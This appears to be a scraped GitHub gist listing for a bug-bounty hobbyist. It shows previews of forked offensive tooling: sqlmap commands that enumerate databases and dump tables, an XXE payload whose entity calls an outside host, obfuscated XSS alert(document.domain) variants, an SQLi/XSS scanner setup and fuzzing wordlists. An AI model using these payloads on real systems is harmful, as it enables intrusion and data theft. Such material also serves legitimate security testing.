# Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs
# Enumerate tables
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables
# Dump table data
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
Nasur Ullah Spy0x7
💢
Spy0x7
/ .bash_profile
Created
March 18, 2021 16:43
— forked from dwisiswant0/.bash_profile
SQLi & XSS Vulnerability Scanner
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### | |
| # ▶ go get -u github.com/lc/gau | |
| # ▶ go get -u github.com/tomnomnom/qsreplace | |
| # ▶ go get -u github.com/tomnomnom/hacks/kxss | |
| # ▶ go get -u github.com/hahwul/dalfox | |
| # ▶ git clone https://github.com/dwisiswant0/DSSS | |
| ### | |
| gauq() { |
Spy0x7
/ sqlmap-cheat-sheet.md
Created
March 7, 2021 08:53
— forked from jkullick/sqlmap-cheat-sheet.md
SQLMap Cheat Sheet
Spy0x7
/ CGI fuzzing.txt
Created
February 9, 2021 14:42
— forked from saurabh96216/CGI fuzzing.txt
CGI wordlist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| TiVoConnect?Command=QueryServer | |
| TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes | |
| cgi-bin/cart32.exe | |
| cgi-bin/classified.cgi | |
| cgi-bin/download.cgi | |
| cgi-bin/flexform.cgi | |
| cgi-bin/flexform | |
| cgi-bin/lwgate.cgi | |
| cgi-bin/LWGate.cgi | |
| cgi-bin/lwgate |
Spy0x7
/ XXE_payloads
Created
December 8, 2020 19:42
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
Spy0x7
/ Unique wayback url
Created
September 6, 2020 18:46
— forked from dubey-amit/Unique wayback url
Get all the Wayback endpoints to compare it with your Burp crawled URLs & probe all the unique endpoints.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cat urls | unfurl -u format %s://%d%p > unique && sort -uo unique unique && cat unique | unfurl -u domains | waybackurls | unfurl -u format %s://%d%p > wayurl && sort -uo wayurl wayurl | comm -1 -3 unique wayurl > final && rm urls && rm unique && rm wayurl && httpx -l final --status-code -silent --content-length | grep -i 200 |
Spy0x7
/ content-types.txt
Created
September 6, 2020 18:45
— forked from BuffaloWill/content-types.txt
Content-Type Dictionary Bruteforcing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # from https://svn.apache.org/repos/asf/httpd/httpd/trunk/docs/conf/mime.types | |
| application/1d-interleaved-parityfec | |
| application/3gpdash-qoe-report+xml | |
| application/3gpp-ims+xml | |
| application/a2l | |
| application/activemessage | |
| application/alto-costmap+json | |
| application/alto-costmapfilter+json | |
| application/alto-directory+json |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #-------------------------------------------------------------------------------------------- | |
| # if found on gist use `git clone https://gist.github.com/650d59476b86fbe885e66af953099006.git .` | |
| # this is a modified version of Emmanuel Rouat [no-email] bashrc how to which can be found at | |
| # `http://tldp.org/LDP/abs/html/sample-bashrc.html` | |
| #-------------------------------------------------------------------------------------------- | |
| # If not running interactively, don't do anything | |
| [ -z "$PS1" ] && return | |
| #------------------------------------------------------------- |
Spy0x7
/ List of API endpoints & objects
Created
August 28, 2020 05:49
— forked from yassineaboukir/List of API endpoints & objects
A list of 3203 common API endpoints and objects designed for fuzzing.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 1 | |
| 1.0 | |
| 10 | |
| 100 | |
| 1000 |
Spy0x7
/ alert.js
Created
August 20, 2020 08:34
— forked from tomnomnom/alert.js
Ways to alert(document.domain)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // How many ways can you alert(document.domain)? | |
| // Comment with more ways and I'll add them :) | |
| // I already know about the JSFuck way, but it's too long to add (: | |
| // Direct invocation | |
| alert(document.domain); | |
| (alert)(document.domain); | |
| al\u0065rt(document.domain); | |
| al\u{65}rt(document.domain); | |
| window['alert'](document.domain); |
Spy0x7
/ params.txt
Created
August 11, 2020 19:13
— forked from nullenc0de/params.txt
List of parameters for content discovery
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 | |
| 1 | |
| 11 | |
| 12 | |
| 13 | |
| 14 | |
| 15 | |
| 16 | |
| 17 | |
| 2 |